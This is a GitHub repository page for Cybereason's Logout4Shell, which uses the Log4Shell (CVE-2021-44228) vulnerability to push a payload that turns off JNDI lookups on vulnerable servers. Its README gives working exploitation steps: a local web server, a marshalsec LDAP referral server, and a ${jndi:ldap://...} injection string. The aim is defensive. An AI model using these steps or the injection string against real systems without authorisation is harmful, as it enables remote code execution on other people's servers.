https://github.com/Cybereason/Logout4Shell Skip to content Sign up * Why GitHub? + Features + Mobile + Actions + Codespaces + Packages + Security + Code review + Issues + Integrations + GitHub Sponsors + Customer stories * Team * Enterprise * Explore + Explore GitHub + Learn and contribute + Topics + Collections + Trending + Learning Lab + Open source guides + Connect with others + The ReadME Project + Events + Community forum + GitHub Education + GitHub Stars program * Marketplace * Pricing + Plans + Compare plans + Contact Sales + Education [ ] * # In this repository All GitHub | Jump to | * No suggested jump to results * # In this repository All GitHub | Jump to | * # In this user All GitHub | Jump to | * # In this repository All GitHub | Jump to | Sign in Sign up {{ message }} Cybereason / Logout4Shell Public * Notifications * Star 225 * Fork 17 * Use Log4Shell vulnerability to vaccinate a victim server against Log4Shell 225 stars 17 forks Star Notifications * Code * Issues 1 * Pull requests 0 * Actions * Projects 0 * Wiki * Security * Insights More * Code * Issues * Pull requests * Actions * Projects * Wiki * Security * Insights main Switch branches/tags [ ] Branches Tags Could not load branches Nothing to show Loading {{ refName }} default View all branches Could not load tags Nothing to show {{ refName }} default Loading View all tags 1 branch 0 tags Code Loading Latest commit @Cybereason Cybereason Merge pull request #2 from Firesphere/patch-1 ... ddf83d3 Dec 11, 2021 Merge pull request #2 from Firesphere/patch-1 Addressing issue #1 ddf83d3 Git stats * 15 commits Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time assets Logo Dec 10, 2021 src/main/java Initial commit Dec 10, 2021 .gitignore Create .gitignore Dec 10, 2021 README.md Addressing issue #1 Dec 11, 2021 pom.xml Adding explicit java version Dec 11, 2021 View code Logout4Shell Description How it works How to use DISCLAIMER: Credits README.md Logout4Shell logo Description A vulnerability impacting Apache Log4j versions 2.0 through 2.14.1 was disclosed on the project's Github on December 9, 2021. The flaw has been dubbed "Log4Shell,", and has the highest possible severity rating of 10. Software made or managed by the Apache Software Foundation (From here on just "Apache") is pervasive and comprises nearly a third of all web servers in the world--making this a potentially catastrophic flaw. The Log4Shell vulnerability CVE-2021-44228 was published on 12/9/2021 and allows remote code execution on vulnerabe servers. While the best mitigation against this vulnerability is to patch log4j to 2.15.0 and above, in Log4j version (>=2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to true or by removing the JndiLookup class from the classpath. Additionally, if the server has Java runtimes >= 8u121, then by default, the settings com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase are set to "false", mitigating this risk. However, enabling these system property requires access to the vulnerable servers as well as a restart. The Cybereason research team has developed the following code that exploits the same vulnerability and the payload therein forces the logger to reconfigure itself with the vulnerable setting disabled - this effectively blocks any further attempt to exploit Log4Shell on this server You can learn more here How it works The payload and exploit below use the java runtime to reconfigure the logger. Prior to reconfiguring the global setting FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS is set to True, disabling message format lookups and preventing further exploitation of this attack How to use 1. Download this report and build it 1.1 git clone https://github.com/cybereason/Logout4Shell.ssh 1.2 build it - mvn package 1.3 cd target/class 1.4 run the webserver - python3 -m http.server 8888 2. Download, build and run Marshalsec's ldap server 2.1 git clone https://github.com/mbechler/marshalsec.git 2.2 mvn package -DskipTests 2.3 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http:// :8888/#Log4jRCE" 3. To immunize a server 3.1 enter ${jndi:ldap://:1389/a} into a vulnerable field (such as user name) DISCLAIMER: The code described in this advisory (the "Code") is provided on an "as is" and "as available" basis may contain bugs, errors and other defects. You are advised to safeguard important data and to use caution. By using this Code, you agree that Cybereason shall have no liability to you for any claims in connection with the Code. Cybereason disclaims any liability for any direct, indirect, incidental, punitive, exemplary, special or consequential damages, even if Cybereason or its related parties are advised of the possibility of such damages. Cybereason undertakes no duty to update the Code or this advisory. Credits The initial repo and inspiration for this work is based on the work of tangxiaofeng7/apache-log4j-poc About Use Log4Shell vulnerability to vaccinate a victim server against Log4Shell Resources Readme Releases No releases published Packages 0 No packages published Contributors 4 * @cr-mitmit cr-mitmit * @cr-maayansela cr-maayansela Maayan-Sela * @Firesphere Firesphere Simon Erkelens * @Cybereason Cybereason Cybereason Languages * Java 100.0% * (c) 2021 GitHub, Inc. * Terms * Privacy * Security * Status * Docs * Contact GitHub * Pricing * API * Training * Blog * About You can't perform that action at this time. You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.